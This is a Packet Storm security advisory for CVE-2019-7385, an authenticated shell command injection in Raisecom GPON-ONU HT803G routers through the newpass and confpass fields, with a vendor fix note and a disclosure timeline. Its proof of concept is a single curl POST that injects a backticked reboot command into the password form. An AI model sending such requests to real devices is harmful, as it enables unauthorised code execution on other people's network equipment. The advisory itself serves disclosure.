exploit the possibilities

Raisecom Technology GPON-ONU HT803G-07 Command Injection

Raisecom Technology GPON-ONU HT803G-07 Command Injection
Posted Feb 13, 2019
Authored by Kaustubh G. Padwad

Raisecom Technology GPON-ONU HT803G-07 suffers from an authenticated command injection vulnerability in the newpass and confpass parameters in /bin/WebMGR.

tags | exploit
advisories | CVE-2019-7385
MD5 | 96852f7edee55b1d7fe41b06c5100e95

Raisecom Technology GPON-ONU HT803G-07 Command Injection

Change Mirror Download
=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated Shell command Injection
Author: Kaustubh G. Padwad

Vendor: Raisecom technology co.,LTD
Product: GPON-ONU HT803G-07 (could be more who shares the same codebase)

Potentially vulnerable

ISCOM HT803G-U
ISCOM HT803G-W
ISCOM HT803G-1GE
ISCOM HT803G


Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical

Advisory ID
============
KSA-Dev-006


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform.


Description:
============
An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with thefirmware version ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below, The values of the newpass and confpass parameters in /bin/WebMGR are used in a system call in the firmware. Because there is no user input validation, this leads to authenticated code execution on the device.

[Additional_information]

The value of newpass and confpass in /bin/WebMGR parameter is parse to system call in the Firmware and since their is no user input validation this leads to authenticated code execution on device

Vulnerability Class:
====================
Authenticated Shell Command Injection


Attack Type
===========
Local


Impact Code execution
=====================
true


Attack Vectors
==============
TO exploit this vulnerability one needs to parse the correct request to the device or they one needs to visit the crafted Page


How to Reproduce: (POC):
========================

curl -i -s -k -X 'POST' \
-H 'Origin: http://192.168.1.1' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \
--data-binary $'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN' \
'http://192.168.1.1/boaform/formPasswordSetup'

Mitigation
==========

This issue is fixed in latest firmware as per vendor.

Disclosure:
===========
28-NOV-2018 Discoverd the Vulnerability
28-NOV-2018 Reported to vendor
10-Dec-2018 Recived confirmation from vendor regarding fix
05-JAN-2019 Request for the CVE-ID
04-FEB-2019 CVE Assigned

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    4 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close